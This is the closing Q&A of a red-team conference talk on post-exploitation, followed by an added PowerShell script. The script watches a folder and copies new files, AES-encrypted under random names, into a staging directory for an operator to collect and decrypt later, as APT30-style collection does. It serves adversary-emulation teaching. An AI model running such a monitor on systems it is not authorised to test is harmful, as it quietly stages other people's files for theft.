Ah, great question. He's trying to stump me. By the way, I work for this guy, so he's just trying to troll me. Post-exploitation in Linux: so it's a great question. We're heavy PowerShell people; you'll see that. We also maintain a tool called EmPyre, Python Empire, which has since been rolled into Empire. We have an entire RAT that we've built and released for Linux and Mac which is built to do just that, so it's focused on post-exploitation modules written for those tool sets. You'll notice that a lot of adversaries have tool kits in Linux and Mac, but they're a lot harder to find because there are fewer of them. I would say it's because nine of the top ten commercial organizations use Active Directory, and therefore they use a majority of Windows. We have operated in ninety percent Mac environments and successfully conducted post-exploitation, so it's doable; it's just as doable as anywhere else. You just have to know where to draw your inspiration and how to code the tools. Questions? No? All right, either that was a really good presentation or you're all sleeping. [Applause] [Music]
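The asynchronous monitor-and-stage flow the talk describes for the file share scenario (FileSystemWatcher firing on a new file, the file written encrypted to a pickup directory, the operator decrypting it later), as an added PowerShell example. This is not the speakers' Start-FileSystemMonitor or Write-FlashFloodFile code and it does not reproduce APT30's obfuscation routine; it uses standard AES-CBC, which is what the speaker recommends for anything sensitive. The watched directory, the staging directory and the key are assumptions for the demo.

```powershell
# Added example (not the speakers' tool): watch a directory with
# System.IO.FileSystemWatcher and copy each newly created or changed file,
# AES-encrypted, into a staging directory for later pickup.
# The two paths and the key below are assumptions for the demo.

$WatchPath = Join-Path $env:USERPROFILE 'Desktop\Secret'   # assumed monitored directory
$StagePath = Join-Path $env:TEMP 'stage'                   # assumed staging directory
$Key       = [byte[]](1..32)                               # demo key only; generate a real one per engagement

New-Item -ItemType Directory -Force -Path $WatchPath, $StagePath | Out-Null

# Defined in the global scope so the event action below can call it even
# when this file is run as a script rather than dot-sourced.
function global:Protect-FileToStage {
    param([string]$Path, [string]$StageDir, [byte[]]$Key)
    # A Created event can fire before the writer has released the file, so
    # retry briefly on a sharing violation instead of losing the file.
    $bytes = $null
    for ($i = 0; $i -lt 10 -and $null -eq $bytes; $i++) {
        try { $bytes = [System.IO.File]::ReadAllBytes($Path) }
        catch { Start-Sleep -Milliseconds 100 }
    }
    if ($null -eq $bytes) { return $null }

    $aes = [System.Security.Cryptography.Aes]::Create()      # CBC + PKCS7 by default
    $aes.Key = $Key
    $aes.GenerateIV()                                        # fresh IV per file, prepended to the blob
    $enc = $aes.CreateEncryptor()
    $cipher = $enc.TransformFinalBlock($bytes, 0, $bytes.Length)
    $out = Join-Path $StageDir ([guid]::NewGuid().ToString('N'))   # random name, no hint of the source
    [System.IO.File]::WriteAllBytes($out, [byte[]]($aes.IV + $cipher))
    $enc.Dispose(); $aes.Dispose()
    return $out
}

# Operator side: decrypt a staged blob back to text on pickup.
function global:Unprotect-StageFile {
    param([string]$Path, [byte[]]$Key)
    $blob = [System.IO.File]::ReadAllBytes($Path)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $Key
    $aes.IV  = [byte[]]$blob[0..15]
    $dec = $aes.CreateDecryptor()
    $plain = $dec.TransformFinalBlock($blob, 16, $blob.Length - 16)
    $dec.Dispose(); $aes.Dispose()
    return [System.Text.Encoding]::UTF8.GetString($plain)
}

$watcher = New-Object System.IO.FileSystemWatcher $WatchPath
$watcher.IncludeSubdirectories = $true
$watcher.NotifyFilter = [System.IO.NotifyFilters]'FileName, LastWrite'
$watcher.EnableRaisingEvents = $true

# Register-ObjectEvent runs the action asynchronously on the engine's event
# queue; -MessageData carries the stage directory and key into the action.
$data = @{ Stage = $StagePath; Key = $Key }
$subs = foreach ($name in 'Created', 'Changed') {
    Register-ObjectEvent -InputObject $watcher -EventName $name -MessageData $data -Action {
        $d = $Event.MessageData
        $p = $Event.SourceEventArgs.FullPath
        if (Test-Path -LiteralPath $p -PathType Leaf) {
            Protect-FileToStage -Path $p -StageDir $d.Stage -Key $d.Key | Out-Null
        }
    }
}

# Pickup later:   Get-ChildItem $StagePath | ForEach-Object { Unprotect-StageFile -Path $_.FullName -Key $Key }
# Cleanup:        $subs | Unregister-Event; $watcher.Dispose()
```

Run it in an interactive session and drop a text file into the watched folder; a GUID-named blob appears in the staging directory almost immediately, and it decrypts only with the key. Two practical caveats: Windows raises several Changed events for a single save, so expect duplicate blobs per file unless you dedupe on path and LastWriteTime, and the watcher only sees files created after it starts, so a file that exists beforehand needs a one-time Get-ChildItem pass.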